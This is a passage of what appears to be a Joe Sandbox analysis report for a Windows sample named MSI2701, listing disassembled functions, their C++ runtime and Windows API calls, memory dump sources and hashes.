                                                                                                                                                              • Part of subcall function 004C8C20: std::_Lockit::_Lockit.LIBCPMT ref: 004C8C50
                                                                                                                                                              • Part of subcall function 004C8C20: std::_Lockit::~_Lockit.LIBCPMT ref: 004C8C78
                                                                                                                                                            • messages.LIBCPMT ref: 004D262E
                                                                                                                                                            • std::_Facet_Register.LIBCPMT ref: 004D2645
                                                                                                                                                            • std::_Lockit::~_Lockit.LIBCPMT ref: 004D2665
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000004.00000002.1449264000.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                                                            • Associated: 00000004.00000002.1449221194.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.1449357883.0000000000507000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.1449400787.000000000051C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.1449426865.0000000000520000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_4_2_4c0000_MSI2701.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Registermessages
                                                                                                                                                            • String ID: 2N
                                                                                                                                                            • API String ID: 2750803064-2395104290
                                                                                                                                                            • Opcode ID: aebd71120db6553cbe9e801560ffe9cc37811a0153b3820d42916466b6693686
                                                                                                                                                            • Instruction ID: ed64d3f00ca29597eee2bd3db0cf1bbd05d388baee09056562976a18d0a174c0
                                                                                                                                                            • Opcode Fuzzy Hash: aebd71120db6553cbe9e801560ffe9cc37811a0153b3820d42916466b6693686
                                                                                                                                                            • Instruction Fuzzy Hash: E501C0359002199BCB05EF619825BBE7BB0BFA4715F24444FF4006B391CFB89E05CBA9
                                                                                                                                                            APIs
                                                                                                                                                            • __EH_prolog3.LIBCMT ref: 004D267F
                                                                                                                                                            • std::_Lockit::_Lockit.LIBCPMT ref: 004D2689
                                                                                                                                                              • Part of subcall function 004C8C20: std::_Lockit::_Lockit.LIBCPMT ref: 004C8C50
                                                                                                                                                              • Part of subcall function 004C8C20: std::_Lockit::~_Lockit.LIBCPMT ref: 004C8C78
                                                                                                                                                            • messages.LIBCPMT ref: 004D26C3
                                                                                                                                                            • std::_Facet_Register.LIBCPMT ref: 004D26DA
                                                                                                                                                            • std::_Lockit::~_Lockit.LIBCPMT ref: 004D26FA
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000004.00000002.1449264000.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                                                            • Associated: 00000004.00000002.1449221194.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.1449357883.0000000000507000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.1449400787.000000000051C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.1449426865.0000000000520000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_4_2_4c0000_MSI2701.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Registermessages
                                                                                                                                                            • String ID: 2N
                                                                                                                                                            • API String ID: 2750803064-2395104290
                                                                                                                                                            • Opcode ID: 02473015467922f0c75f7de3a66df96035650740186416f7c9cb84b558b6a0cd
                                                                                                                                                            • Instruction ID: a601f4206100ee6435a53fcdabf8d4ad442f9122650b28b1925baaac2e25aa69
                                                                                                                                                            • Opcode Fuzzy Hash: 02473015467922f0c75f7de3a66df96035650740186416f7c9cb84b558b6a0cd
                                                                                                                                                            • Instruction Fuzzy Hash: 7101C035900219AFCB05EB65C915BBEB7B0BF94714F24444FE5006B392CFB8EE059BA9
                                                                                                                                                            APIs
                                                                                                                                                            • __EH_prolog3.LIBCMT ref: 004CD6C4
                                                                                                                                                            • std::_Lockit::_Lockit.LIBCPMT ref: 004CD6CE
                                                                                                                                                              • Part of subcall function 004C8C20: std::_Lockit::_Lockit.LIBCPMT ref: 004C8C50
                                                                                                                                                              • Part of subcall function 004C8C20: std::_Lockit::~_Lockit.LIBCPMT ref: 004C8C78
                                                                                                                                                            • codecvt.LIBCPMT ref: 004CD708
                                                                                                                                                            • std::_Facet_Register.LIBCPMT ref: 004CD71F
                                                                                                                                                            • std::_Lockit::~_Lockit.LIBCPMT ref: 004CD73F
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000004.00000002.1449264000.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                                                            • Associated: 00000004.00000002.1449221194.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.1449357883.0000000000507000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.1449400787.000000000051C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.1449426865.0000000000520000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_4_2_4c0000_MSI2701.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Registercodecvt
                                                                                                                                                            • String ID: 2N
                                                                                                                                                            • API String ID: 712880209-2395104290
                                                                                                                                                            • Opcode ID: cc8eac70816d511f9816705f7552bcb1d01a871e5afa9ae3f87f4987a20278c0
                                                                                                                                                            • Instruction ID: 99898c08062ed16c4a641458226155745326c39c5cdb15d33cf4c23544a20c39
                                                                                                                                                            • Opcode Fuzzy Hash: cc8eac70816d511f9816705f7552bcb1d01a871e5afa9ae3f87f4987a20278c0
                                                                                                                                                            • Instruction Fuzzy Hash: 0E01C439D001159BCB05EB618855BBE77B0FF94714F24041FE400673D2CF789E018B99
                                                                                                                                                            APIs
                                                                                                                                                            • __EH_prolog3.LIBCMT ref: 004DE84A
                                                                                                                                                            • std::_Lockit::_Lockit.LIBCPMT ref: 004DE854
                                                                                                                                                              • Part of subcall function 004C8C20: std::_Lockit::_Lockit.LIBCPMT ref: 004C8C50
                                                                                                                                                              • Part of subcall function 004C8C20: std::_Lockit::~_Lockit.LIBCPMT ref: 004C8C78
                                                                                                                                                            • collate.LIBCPMT ref: 004DE88E
                                                                                                                                                            • std::_Facet_Register.LIBCPMT ref: 004DE8A5
                                                                                                                                                            • std::_Lockit::~_Lockit.LIBCPMT ref: 004DE8C5
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000004.00000002.1449264000.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                                                            • Associated: 00000004.00000002.1449221194.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.1449357883.0000000000507000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.1449400787.000000000051C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.1449426865.0000000000520000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_4_2_4c0000_MSI2701.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Registercollate
                                                                                                                                                            • String ID: 2N
                                                                                                                                                            • API String ID: 1007100420-2395104290
                                                                                                                                                            • Opcode ID: 7f92dc5b51f1d2ab2c9cea664d6d93ed4eb2fc26ea754a285f67b2aa25a44b42
                                                                                                                                                            • Instruction ID: 379fdd2d750a5418b162ff3b19fa796a7d3209596c5e120ff3ce31117f95b0a2
                                                                                                                                                            • Opcode Fuzzy Hash: 7f92dc5b51f1d2ab2c9cea664d6d93ed4eb2fc26ea754a285f67b2aa25a44b42
                                                                                                                                                            • Instruction Fuzzy Hash: 5501AD35900159ABCB05FB669825BBEB7B1BF94714F24440FF400AB391CF789E059BAA
                                                                                                                                                            APIs
                                                                                                                                                            • __EH_prolog3.LIBCMT ref: 004DE8DF
                                                                                                                                                            • std::_Lockit::_Lockit.LIBCPMT ref: 004DE8E9
                                                                                                                                                              • Part of subcall function 004C8C20: std::_Lockit::_Lockit.LIBCPMT ref: 004C8C50
                                                                                                                                                              • Part of subcall function 004C8C20: std::_Lockit::~_Lockit.LIBCPMT ref: 004C8C78
                                                                                                                                                            • messages.LIBCPMT ref: 004DE923
                                                                                                                                                            • std::_Facet_Register.LIBCPMT ref: 004DE93A
                                                                                                                                                            • std::_Lockit::~_Lockit.LIBCPMT ref: 004DE95A
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000004.00000002.1449264000.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                                                            • Associated: 00000004.00000002.1449221194.00000000004C0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                            • Associated: 00000004.00000002.1449357883.0000000000507000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                            • Associated: 00000004.00000002.1449400787.000000000051C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                            • Associated: 00000004.00000002.1449426865.0000000000520000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_4_2_4c0000_MSI2701.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Registermessages
                                                                                                                                                            • String ID: 2N
                                                                                                                                                            • API String ID: 2750803064-2395104290
                                                                                                                                                            • Opcode ID: a06337638c3d0e6ea5c71cbc533656be095a808df7f8a44f51cea668b2097411
                                                                                                                                                            • Instruction ID: d8e27570a2dc5e4a7363466b7536bafd543344dcda1ecdbfe57e5c66bf95bd9c
                                                                                                                                                            • Opcode Fuzzy Hash: a06337638c3d0e6ea5c71cbc533656be095a808df7f8a44f51cea668b2097411
                                                                                                                                                            • Instruction Fuzzy Hash: 4F01C075901129DBCB05FB628865BBE7BB0BF84714F24054FF500AB391CF789E018BAA
                                                                                                                                                            APIs
                                                                                                                                                            • __EH_prolog3.LIBCMT ref: 004D2968
                                                                                                                                                            • std::_Lockit::_Lockit.LIBCPMT ref: 004D2972
                                                                                                                                                              • Part of subcall function 004C8C20: std::_Lockit::_Lockit.LIBCPMT ref: 004C8C50
                                                                                                                                                              • Part of subcall function 004C8C20: std::_Lockit::~_Lockit.LIBCPMT ref: 004C8C78
                                                                                                                                                            • moneypunct.LIBCPMT ref: 004D29AC
                                                                                                                                                            • std::_Facet_Register.LIBCPMT ref: 004D29C3
                                                                                                                                                            • std::_Lockit::~_Lockit.LIBCPMT ref: 004D29E3
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000004.00000002.1449264000.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                                                            • Associated: 00000004.00000002.1449221194.00000000004C0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                            • Associated: 00000004.00000002.1449357883.0000000000507000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                            • Associated: 00000004.00000002.1449400787.000000000051C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                            • Associated: 00000004.00000002.1449426865.0000000000520000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_4_2_4c0000_MSI2701.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Registermoneypunct
                                                                                                                                                            • String ID: 2N
                                                                                                                                                            • API String ID: 419941038-2395104290
                                                                                                                                                            • Opcode ID: 04a003c3be2fc07628699735e7cae8a6044cc715fb00d204edb41836dc3ce709
                                                                                                                                                            • Instruction ID: dbcb79087b5d25142a45104b6bd45c76673e8caecf4d3997196ec487d52e9970
                                                                                                                                                            • Opcode Fuzzy Hash: 04a003c3be2fc07628699735e7cae8a6044cc715fb00d204edb41836dc3ce709
                                                                                                                                                            • Instruction Fuzzy Hash: F0012275A00119DBCB01EB61C826BBE77B0BF94314F24044FF4106B391CF789E008BAA
                                                                                                                                                            APIs
                                                                                                                                                            • __EH_prolog3.LIBCMT ref: 004D29FD
                                                                                                                                                            • std::_Lockit::_Lockit.LIBCPMT ref: 004D2A07
                                                                                                                                                              • Part of subcall function 004C8C20: std::_Lockit::_Lockit.LIBCPMT ref: 004C8C50
                                                                                                                                                              • Part of subcall function 004C8C20: std::_Lockit::~_Lockit.LIBCPMT ref: 004C8C78
                                                                                                                                                            • moneypunct.LIBCPMT ref: 004D2A41
                                                                                                                                                            • std::_Facet_Register.LIBCPMT ref: 004D2A58
                                                                                                                                                            • std::_Lockit::~_Lockit.LIBCPMT ref: 004D2A78
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000004.00000002.1449264000.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                                                            • Associated: 00000004.00000002.1449221194.00000000004C0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                            • Associated: 00000004.00000002.1449357883.0000000000507000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                            • Associated: 00000004.00000002.1449400787.000000000051C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                            • Associated: 00000004.00000002.1449426865.0000000000520000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_4_2_4c0000_MSI2701.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Registermoneypunct
                                                                                                                                                            • String ID: 2N
                                                                                                                                                            • API String ID: 419941038-2395104290
                                                                                                                                                            • Opcode ID: aba92864f66d728e457fe502b76c703ad50011a97e9c45c3e59974157d33b3a5
                                                                                                                                                            • Instruction ID: b9176dcaee4b99e0cee0fe5b0cdd4a586be0bc51a22303f642d63a061970d4b6
                                                                                                                                                            • Opcode Fuzzy Hash: aba92864f66d728e457fe502b76c703ad50011a97e9c45c3e59974157d33b3a5
                                                                                                                                                            • Instruction Fuzzy Hash: 14010035800119EBCB11EB61C825BBE77B1FFA4314F24040FE400AB391CF789E028BA9
                                                                                                                                                            APIs
                                                                                                                                                            • __EH_prolog3.LIBCMT ref: 004D2A92
                                                                                                                                                            • std::_Lockit::_Lockit.LIBCPMT ref: 004D2A9C
                                                                                                                                                              • Part of subcall function 004C8C20: std::_Lockit::_Lockit.LIBCPMT ref: 004C8C50
                                                                                                                                                              • Part of subcall function 004C8C20: std::_Lockit::~_Lockit.LIBCPMT ref: 004C8C78
                                                                                                                                                            • moneypunct.LIBCPMT ref: 004D2AD6
                                                                                                                                                            • std::_Facet_Register.LIBCPMT ref: 004D2AED
                                                                                                                                                            • std::_Lockit::~_Lockit.LIBCPMT ref: 004D2B0D
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000004.00000002.1449264000.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                                                            • Associated: 00000004.00000002.1449221194.00000000004C0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                            • Associated: 00000004.00000002.1449357883.0000000000507000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                            • Associated: 00000004.00000002.1449400787.000000000051C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                            • Associated: 00000004.00000002.1449426865.0000000000520000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_4_2_4c0000_MSI2701.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Registermoneypunct
                                                                                                                                                            • String ID: 2N
                                                                                                                                                            • API String ID: 419941038-2395104290
                                                                                                                                                            • Opcode ID: 3d982408c76a0fa0f52c249852b7dc3ad2ca0c2779144410f8029aaf7f0f588a
                                                                                                                                                            • Instruction ID: fdfe2ac13d3987413f61b5d3b312d68ad5250d8d32ef27b51e67d44b08214318
                                                                                                                                                            • Opcode Fuzzy Hash: 3d982408c76a0fa0f52c249852b7dc3ad2ca0c2779144410f8029aaf7f0f588a
                                                                                                                                                            • Instruction Fuzzy Hash: D501E1359001199BCB11EF618915BBE77B0BF90314F24484FF500A7392CFB8AE01CBA9
                                                                                                                                                            APIs
                                                                                                                                                            • __EH_prolog3.LIBCMT ref: 004DEA9E
                                                                                                                                                            • std::_Lockit::_Lockit.LIBCPMT ref: 004DEAA8
                                                                                                                                                              • Part of subcall function 004C8C20: std::_Lockit::_Lockit.LIBCPMT ref: 004C8C50
                                                                                                                                                              • Part of subcall function 004C8C20: std::_Lockit::~_Lockit.LIBCPMT ref: 004C8C78
                                                                                                                                                            • moneypunct.LIBCPMT ref: 004DEAE2
                                                                                                                                                            • std::_Facet_Register.LIBCPMT ref: 004DEAF9
                                                                                                                                                            • std::_Lockit::~_Lockit.LIBCPMT ref: 004DEB19
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000004.00000002.1449264000.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                                                            • Associated: 00000004.00000002.1449221194.00000000004C0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                            • Associated: 00000004.00000002.1449357883.0000000000507000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                            • Associated: 00000004.00000002.1449400787.000000000051C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                            • Associated: 00000004.00000002.1449426865.0000000000520000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_4_2_4c0000_MSI2701.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Registermoneypunct
                                                                                                                                                            • String ID: 2N
                                                                                                                                                            • API String ID: 419941038-2395104290
                                                                                                                                                            • Opcode ID: 2572c96af1777340a9c730dc1d36ed599a5ca70939a326b64b62c189a1328720
                                                                                                                                                            • Instruction ID: 0ba90525fb2e2a3000f7224f57e0db73a5ec41aba6b6f39709dfa2ab8196a919
                                                                                                                                                            • Opcode Fuzzy Hash: 2572c96af1777340a9c730dc1d36ed599a5ca70939a326b64b62c189a1328720
                                                                                                                                                            • Instruction Fuzzy Hash: D201AD359001299FCB15FB629855ABE77B1BF94724F24080FE4016B392DF78AE018BA9
                                                                                                                                                            APIs
                                                                                                                                                            • __EH_prolog3.LIBCMT ref: 004DEB33
                                                                                                                                                            • std::_Lockit::_Lockit.LIBCPMT ref: 004DEB3D
                                                                                                                                                              • Part of subcall function 004C8C20: std::_Lockit::_Lockit.LIBCPMT ref: 004C8C50
                                                                                                                                                              • Part of subcall function 004C8C20: std::_Lockit::~_Lockit.LIBCPMT ref: 004C8C78
                                                                                                                                                            • moneypunct.LIBCPMT ref: 004DEB77
                                                                                                                                                            • std::_Facet_Register.LIBCPMT ref: 004DEB8E
                                                                                                                                                            • std::_Lockit::~_Lockit.LIBCPMT ref: 004DEBAE
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000004.00000002.1449264000.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                                                            • Associated: 00000004.00000002.1449221194.00000000004C0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                            • Associated: 00000004.00000002.1449357883.0000000000507000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                            • Associated: 00000004.00000002.1449400787.000000000051C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                            • Associated: 00000004.00000002.1449426865.0000000000520000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_4_2_4c0000_MSI2701.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Registermoneypunct
                                                                                                                                                            • String ID: 2N
                                                                                                                                                            • API String ID: 419941038-2395104290
APIs
• __EH_prolog3.LIBCMT ref: 004D2B27
• std::_Lockit::_Lockit.LIBCPMT ref: 004D2B31
  • Part of subcall function 004C8C20: std::_Lockit::_Lockit.LIBCPMT ref: 004C8C50
  • Part of subcall function 004C8C20: std::_Lockit::~_Lockit.LIBCPMT ref: 004C8C78
• moneypunct.LIBCPMT ref: 004D2B6B
• std::_Facet_Register.LIBCPMT ref: 004D2B82
• std::_Lockit::~_Lockit.LIBCPMT ref: 004D2BA2
Strings
Memory Dump Source
• Source File: 00000004.00000002.1449264000.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_4c0000_MSI2701.jbxd
Similarity
• API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Registermoneypunct
• String ID: 2N
• API String ID: 419941038-2395104290
APIs
• __EH_prolog3.LIBCMT ref: 004D2D7B
• std::_Lockit::_Lockit.LIBCPMT ref: 004D2D85
  • Part of subcall function 004C8C20: std::_Lockit::_Lockit.LIBCPMT ref: 004C8C50
  • Part of subcall function 004C8C20: std::_Lockit::~_Lockit.LIBCPMT ref: 004C8C78
• numpunct.LIBCPMT ref: 004D2DBF
• std::_Facet_Register.LIBCPMT ref: 004D2DD6
• std::_Lockit::~_Lockit.LIBCPMT ref: 004D2DF6
Strings
Memory Dump Source
• Source File: 00000004.00000002.1449264000.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_4c0000_MSI2701.jbxd
Similarity
• API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Registernumpunct
• String ID: 2N
• API String ID: 743221004-2395104290
APIs
• GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,C7C71CC4,0000000C,?,00000000,00506A6C,000000FF,?,004F2DC1,?,?,004F2D95,?), ref: 004F2E23
• GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 004F2E35
• FreeLibrary.KERNEL32(00000000,?,00000000,00506A6C,000000FF,?,004F2DC1,?,?,004F2D95,?), ref: 004F2E57
Strings
Memory Dump Source
• Source File: 00000004.00000002.1449264000.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_4c0000_MSI2701.jbxd
Similarity
• API ID: AddressFreeHandleLibraryModuleProc
• String ID: 2N$CorExitProcess$mscoree.dll
• API String ID: 4061214504-2377061492
APIs
• EnterCriticalSection.KERNEL32(0051DD3C,?,?,004C2427,0051E638,00506B40), ref: 004E2C58
• LeaveCriticalSection.KERNEL32(0051DD3C,?,?,004C2427,0051E638,00506B40), ref: 004E2C8B
• RtlWakeAllConditionVariable.NTDLL ref: 004E2D02
• SetEvent.KERNEL32(?,004C2427,0051E638,00506B40), ref: 004E2D0C
• ResetEvent.KERNEL32(?,004C2427,0051E638,00506B40), ref: 004E2D18
Strings
Memory Dump Source
• Source File: 00000004.00000002.1449264000.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_4c0000_MSI2701.jbxd
Similarity
• API ID: CriticalEventSection$ConditionEnterLeaveResetVariableWake
• String ID: 2N
• API String ID: 3916383385-2395104290
APIs
• std::_Lockit::_Lockit.LIBCPMT ref: 004CB531
• std::_Lockit::_Lockit.LIBCPMT ref: 004CB54F
• std::_Lockit::~_Lockit.LIBCPMT ref: 004CB577
• LocalAlloc.KERNEL32(00000040,0000000C,00000000,C7C71CC4,?,00000000,00000000), ref: 004CB5CF
• std::_Facet_Register.LIBCPMT ref: 004CB6B7
• std::_Lockit::~_Lockit.LIBCPMT ref: 004CB6E1
Memory Dump Source
• Source File: 00000004.00000002.1449264000.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_4c0000_MSI2701.jbxd
Similarity
• API ID: std::_$Lockit$Lockit::_Lockit::~_$AllocFacet_LocalRegister
• String ID:
• API String ID: 3931714976-0
APIs
• std::_Lockit::_Lockit.LIBCPMT ref: 004CB731
• std::_Lockit::_Lockit.LIBCPMT ref: 004CB74F
• std::_Lockit::~_Lockit.LIBCPMT ref: 004CB777
• LocalAlloc.KERNEL32(00000040,00000008,00000000,C7C71CC4,?,00000000,00000000), ref: 004CB7CF
• std::_Facet_Register.LIBCPMT ref: 004CB863
• std::_Lockit::~_Lockit.LIBCPMT ref: 004CB88D
Memory Dump Source
• Source File: 00000004.00000002.1449264000.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_4c0000_MSI2701.jbxd
Similarity
• API ID: std::_$Lockit$Lockit::_Lockit::~_$AllocFacet_LocalRegister
• String ID:
• API String ID: 3931714976-0
APIs
Strings
Memory Dump Source
• Source File: 00000004.00000002.1449264000.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                                                            • Associated: 00000004.00000002.1449221194.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.1449357883.0000000000507000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.1449400787.000000000051C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.1449426865.0000000000520000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_4_2_4c0000_MSI2701.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: __freea$__alloca_probe_16
                                                                                                                                                            • String ID: a/p$am/pm
                                                                                                                                                            • API String ID: 3509577899-3206640213
                                                                                                                                                            • Opcode ID: 4cb342339ab31c178d8aab9448ab07f9560f96b78b34634d596ebccb295160a2
                                                                                                                                                            • Instruction ID: 10c9d3e6ae1c215e9e95d08f7ebaf97c607f0ecef7f58eef69afa2f05533a6d9
                                                                                                                                                            • Opcode Fuzzy Hash: 4cb342339ab31c178d8aab9448ab07f9560f96b78b34634d596ebccb295160a2
                                                                                                                                                            • Instruction Fuzzy Hash: 76C1C23590020ADADB24EF69C9856BBB7B0FF85304F14408BE705AB752D279AC42CF5A
APIs
• GetLastError.KERNEL32(00000000,?,?,76ED4450,004C5646,?,?,?,?,?), ref: 004C5898
Strings
Memory Dump Source
• Source File: 00000004.00000002.1449264000.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
• Associated: 00000004.00000002.1449221194.00000000004C0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1449357883.0000000000507000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1449400787.000000000051C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1449426865.0000000000520000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_4c0000_MSI2701.jbxd
Similarity
• API ID: ErrorLast
• String ID: <SQ$Call to ShellExecuteEx() returned:$Last error=$false$true
• API String ID: 1452528299-943509545
• Opcode ID: 88d7902891cc455e5defaa052ab5411120c5a523090ce5dd88eb70fdcfe32717
• Instruction ID: 03086f2d8d90fecc06037fc2983a64bcc50ea851605dfc861e3590f0890f9c00
• Opcode Fuzzy Hash: 88d7902891cc455e5defaa052ab5411120c5a523090ce5dd88eb70fdcfe32717
• Instruction Fuzzy Hash: AA11A05EA10622C6DB702F6C9800B6BA6E4EF90754F65087FD88887391F6B98CC18398
APIs
• GetLastError.KERNEL32(?,?,004E596F,004E4900,004E358F), ref: 004E5986
• ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 004E5994
• ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 004E59AD
• SetLastError.KERNEL32(00000000,004E596F,004E4900,004E358F), ref: 004E59FF
Memory Dump Source
• Source File: 00000004.00000002.1449264000.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
• Associated: 00000004.00000002.1449221194.00000000004C0000.00000002.00000001.01000000.00000003.sdmp
